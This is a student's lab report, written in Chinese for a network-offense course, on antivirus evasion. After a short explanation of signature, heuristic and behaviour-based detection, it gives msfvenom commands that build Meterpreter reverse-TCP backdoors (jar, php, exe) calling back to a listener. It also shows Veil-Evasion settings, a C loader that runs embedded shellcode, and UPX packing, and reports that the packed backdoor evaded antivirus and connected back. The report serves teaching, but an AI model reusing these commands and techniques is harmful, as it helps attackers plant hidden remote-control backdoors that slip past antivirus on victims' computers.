2018-2019-2 网络对抗技术 20165304 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165304 Exp3 免杀原理与实践

免杀原理及基础问题回答

一、免杀原理

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。
二、基础问题回答

问：杀软是如何检测出恶意代码的？
基于特征码的检测：简单来说一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。
启发式恶意软件检测：就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确）
基于行为的恶意软件检测：可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确）
问：免杀是做什么？
使用一些技术手段对恶意软件做处理，让它不被杀毒软件所检测。同时，免杀也是渗透测试中需要使用到的技术。
问：免杀的基本方法有哪些？
改变特征码
只有EXE——加壳（压缩壳 加密壳）
有shellcode(像Meterpreter）——利用encode进行编码
有源代码——用其他语言进行重写再编译
veil-evasion
半手工
改变行为
通讯方式
尽量使用反弹式连接
使用隧道技
加密通讯数据
操作模式
基于内存操作
减少对系统的修改
加入混淆作用的正常功能代码
非常规方法
使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
使用社工类攻击，诱骗目标关闭AV软件。
纯手工打造一个恶意软件
三、免杀效果评价
利用VirusTotal或Virscan，它们集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器，生成exe文件
   在实验二中使用msf生成了后门程序，我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。

用VirusTotal扫描后结果如下：

Virscan网站的扫描结果如下

由此可见不加任何处理的后门程序能够被大多数杀软检测到

2.msfvenom生成jar文件
生成java后门程序使用命令：
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=5304 x> lsy_backdoor_java.jar

3.msfvenom生成php文件
生成PHP后门程序使用命令：
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=5304 x> 20165304_backdoor.php
扫描结果如下：

4.使用veil-evasion生成后门程序及检测
安装veil
用sudo apt-get install veil-evasion命令安装Veil

之后用veil打开veil，输入y继续安装直至完成，这期间可能要等待较长时间：
成功之后，输入veil指令，会出现下面这个界面

用use evasion命令进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP，命令为：set LHOST 192.168.1.130，注意此处的IP是KaliIP；

设置端口，命令为：set LPORT 5304
输入generate生成文件，接着输入你想要playload的名字：veil_c_5304

检测一下：

1. 半手工注入Shellcode并执行
   首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=5304 -f c用c语言生成一段shellcode;
   

创建一个文件20165304.c，然后将unsigned char buf[]赋值到其中，代码如下：
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
int (func)() = (int()())buf;
func();
}

使用命令：i686-w64-mingw32-g++ 20165304.c -o 20165304.exe编译这个.c文件为可执行文件;

当想要使用windows上执行该程序时，被电脑的360卫士查杀

6.加壳尝试一下
加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。
加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）。大多数病毒就是基于此原理。
加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析，以达到保护壳内原始程序以及软件不被外部程序破坏，保证原始程序正常运行。
这种技术也常用来保护软件版权，防止软件被破解。但对于病毒，加壳可以绕过一些杀毒软件的扫描，从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法，对shellcode进行再编码。

在技术上分壳分为：

压缩壳
减少应用体积，如ASPack,UPX
加密壳
版权保护，反跟踪。如ASProtect,Armadillo
虚拟机
通过类似编译手段，将应用指令转换为自己设计的指令集。如VMProtect,Themida
使用压缩壳（UPX）
给之前的20165304.exe加个壳得到sxx_upxed.exe：

杀软没有查到

查看连接情况，可以反弹连接

任务二：通过组合应用各种技术实现恶意代码免杀

通过组合半手工制作shellcode，压缩壳，加密壳达到了免杀的目的
任务成功

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

反弹连接失败